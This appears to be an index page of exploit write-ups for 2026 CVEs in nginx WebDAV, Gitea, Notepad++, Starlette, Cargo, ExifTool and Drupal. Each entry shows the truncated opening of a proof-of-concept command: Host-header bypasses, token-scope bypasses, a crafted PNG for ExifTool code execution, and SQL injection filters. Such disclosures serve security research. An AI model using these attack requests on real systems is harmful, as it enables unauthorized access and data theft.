Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...


CVE-2026-27771: gitea

## The Exploit Attacker needs a repository access token that is valid for repo read operations but does not have the specific download/archive scope. ```bash curl -i -H "Authorization: token REPO_READ_ONLY_TOKEN" \ "https://TARGET/user/...


CVE-2026-48800: notepad-plus-plus

## The Exploit An attacker only needs local access to the user's Notepad++ profile files so they can corrupt the File Browser command interpreter setting. ```bash # Set Notepad++ FileBrowser command interpreter to a malicious executable p...


CVE-2026-48710: starlette

## The Exploit The attacker only needs the ability to send HTTP requests to the Starlette application. ```bash curl -i -s -X GET 'http://127.0.0.1:8000/admin' \ -H 'Host: example.com/foo' ``` The app accepts the malformed `Host` header...


CVE-2026-27771: gitea

## The Exploit A low-privilege user able to call the composer package metadata API can retrieve metadata for a private package owner. ```bash curl -i -H "Authorization: token ATTACKER_TOKEN" \ "https://TARGET/api/packages/victimuser/com...


CVE-2026-5222: cargo-cve-2026-5222

## The Exploit An attacker only needs publish rights on a sparse third-party registry hosted under the same domain as another registry. ```bash cat > .cargo/config.toml <<'EOF' [registries.victim] index = "https://registry.example.com/vic...


CVE-2026-3102: exiftool-rce-2026

## The Exploit The attacker only needs the ability to submit a PNG through an ExifTool-powered processing pipeline; no authentication is required on the ExifTool side itself. ```bash #!/bin/bash cat > /tmp/exploit.png <<'EOF' iVBORw0KGgoA...


CVE-2026-9082: drupal-sqli-2026

## The Exploit An attacker only needs a public Drupal JSON:API content endpoint to send a malformed filter array and trigger SQL injection. ```bash curl -G 'https://TARGET/jsonapi/node/page' \ -H 'Accept: application/vnd.api+json' \ -...


CVE-2026-48710: starlette-badhost

## The Exploit An unauthenticated attacker only needs network access to send a crafted `Host` header. ```bash curl -v -H "Host: foo/bar" http://TARGET/admin ``` The request is routed to the actual path `/admin`, but Starlette rebuilds `r...
